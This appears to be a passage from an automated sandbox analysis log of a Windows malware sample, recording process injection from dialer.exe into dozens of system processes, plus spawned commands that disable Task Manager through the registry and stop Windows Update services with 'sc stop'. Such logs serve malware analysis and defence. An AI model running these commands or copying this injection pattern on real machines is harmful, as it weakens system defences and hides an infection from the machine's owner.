                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\w32tm.exe base: 216AC280000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\w32tm.exe base: 216AC3A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: B50000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: B80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: A00000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: F00000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 17C74420000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 17C76250000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1AEDEAC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1AEDEBE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 790000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 15931960000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 1BB00000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1510000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1D750000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 780000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1BB80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1617D4E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1617D540000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1A78A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1A7900000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 900000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8B5AB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 10B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1410000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1C810000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 21154530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 21154810000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1B71D230000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1B71D810000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 201FF280000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1550000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 201FF410000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E314900000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1CA40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 11D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 19D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B988570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 258801A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 1390000 value: 4D
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeThread register set: target process: 1456Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeMemory written: C:\Windows\System32\dialer.exe base: AD4B636010Jump to behavior
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEF80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166960000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1390000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F49DCF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20AF95B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 24EBE490000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1F5E7FA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26F6BA40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20B657E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28453480000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\twain_32.exe base: 24B34510000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 216AAA70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1AFC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D4EDD40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 13ACAE60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: BA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1330000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1ACD1120000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: B50000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1BB84960000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: BA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB6560000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27F1A600000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1ECA8620000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A77D1E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C6117C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27614EA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15F733A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2D365CB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 11840E70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C67E130000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24CF8170000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CD66020000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 213113F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D211960000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25F1BEF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB8360000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2047E150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF37F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2C34E3F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C611AB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038510000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D92BF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF3910000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1FB26780000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038560000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D060000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 294ABE90000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 770000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442D80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D180000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: D80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 14DDD380000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1D80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442FA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BE168A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 7D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1EA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 12615CC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 255036C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F56B300000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28115FE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1190000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C1574B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2B5675A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2185C8F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C14D340000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25402690000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25CD1C10000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 11C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 195DDA30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 195DDC50000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E984CE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 193F0F20000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19D83000000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 27E70890000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 27E708C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\chcp.com base: 1FD689F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\chcp.com base: 1FD68A40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: F00000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1030000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1540000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1670000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\w32tm.exe base: 216AC280000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\w32tm.exe base: 216AC3A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: B50000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: B80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: A00000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: F00000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 17C74420000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 17C76250000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1AEDEAC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1AEDEBE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 790000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 15931960000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 1BB00000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1510000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1D750000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 780000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1BB80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1617D4E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1617D540000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1A78A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1A7900000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 900000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8B5AB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 10B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1410000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1C810000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 21154530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 21154810000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1B71D230000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\consent.exe base: 1B71D810000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 201FF280000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1550000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 201FF410000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E314900000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1CA40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 11D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 19D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B988570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 258801A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 264EB0A0000
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe "C:\Users\user\AppData\Local\Temp\Astral private DLL.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\twain_32.exe "C:\Users\user\AppData\Local\Temp\twain_32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\containerperf\ServerComponenthostMonitorDll.exe "C:\containerperf/ServerComponenthostMonitorDll.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
